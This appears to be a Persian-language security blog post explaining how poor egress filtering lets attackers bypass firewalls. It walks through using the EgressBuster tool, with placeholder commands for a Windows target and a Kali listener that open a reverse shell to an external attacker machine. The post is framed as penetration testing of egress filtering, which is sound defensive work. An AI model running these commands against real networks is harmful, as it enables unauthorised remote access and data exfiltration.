info[at]nsec.ir
(+۹۸)-۳۱-۳۳۹۱۵۳۳۶

همراهی دوست گرمابه و دشمن جانی، کمک فایروال به پیاده نمودن سرور کنترل و فرمان

خلاصه: فایروال‌های شبکه به‌ عنوان یک ثبات برای حفظ امنیت شبکه داخلی شرکت عمل می‌کنند. اغلب مردم فکر می‌کنند که فایروال از دستگاه‌ها در برابر ترافیک ورودی محافظت می‌کند. بیشتر ارتباطات خارجی بدون فیلتر ترافیک خروجی  ناامن هستند. اگر فیلتر ترافیک خروجی شکست بخورد، مهاجمان فایروال را برای کنترل و فرمان شبکه‌ی خارجی دور می‌زنند.

فایروال‌های شبکه به‌ عنوان یک ثبات برای حفظ امنیت شبکه داخلی شرکت، عمل می‌کنند. اغلب مردم فکر می‌کنند که فایروال از دستگاه‌ها در برابر ترافیک ورودی محافظت می‌کند. بیشتر ارتباطات خارجی بدون فیلتر ترافیک خروجی  ناامن هستند. اگر فیلتر ترافیک خروجی شکست بخورد، مهاجمان فایروال را برای کنترل و فرمان شبکه‌ی خارجی دور می‌زنند.

ترافیک خروجی فیلتر ‌شده، کاربران داخلی شما را در برابر خروج از شبکه‌ی شما و رفتن به هرجایی که دوست دارند (شبکه‌های مختلف) محدود می‌کنند. بنابراین فیلتر کردن ترافیک خروجی به کاهش استخراج داده از شبکه‌ی شما کمک می‌کند.

در حین انجام تست نفوذ، سازمان‌ها استثناهایی را به پورت‌ها برای جلوگیری از دسترسی به اینترنت خارج اعمال می‌کنند. همین‌ طور Egressbuster میزان اثربخشی فیلتر کردن خروجی را در یک محیط تست خواهد کرد.

در ادامه چگونگی کار با EgressBuster و این که چگونه می‌توانیم با استفاده از آن shell بگیریم را توضیح خواهیم داد.

ماشین هدف (Windows 10)

  • یک دستور را اجرا کنید :

 egressbuster.exe <External Attackers Listening Ip> <Range of ports> shell

  • اکنون بسته‌های TCP بر روی هر پورت نشأت گرفته از داخل فایروال  به پورت‌های listening خارجی سرور ارسال خواهند شد.
  • سرور خارجی ماشین مهاجم با سیستم‌عامل کالی می‌باشد.

 

ماشین مهاجم (لینوکس کالی)

  • شنونده خارج شبکه از یک iptable برای گوش دادن به همه‌ ی ۶۵۰۰۰ پورت برای یک اتصال استفاده می‌کند.

دور زدن فایروال

  • دستور زیر را اجرا کنید:

egress_listener.py <Kali Linux Ip or Attackers Ip> <Select Interface> <Victims Ip> shell

  • هنگامی که شبکه‌ی داخلی در فیلتر کردن خروجی مؤثر نیست، در این زمان باید Shell بگیریم.

ماشین به ‌دست آمده‌ی قربانی‌ها

  • شبکه‌ی قربانیان با پورت ۱۰۹۰/tcp باز شده و به دلیل عدم فیلتر کردن خروجی به شبکه‌ی خارجی فرستاده  می‌شود.
  • ارتباط برای یک Shell با موفقیت برقرار شده و به ما امکان تزریق دستور را می‌دهد.
  • اکنون مهاجمان می‌توانند همه‌ی حملات را به شبکه‌ی داخلی انجام دهند.

مهاجمان می‌توانند از این تکنیک برای جمع‌آوری و ارسال داده‌های حساس از شبکه‌ی شما یا برای حمله به شبکه‌های دیگر استفاده کنند. اثربخشی فیلترینگ خروجی را برای شبکه‌تان با EgressBuster تست کنید.

 

تحت نظارت وف ایرانی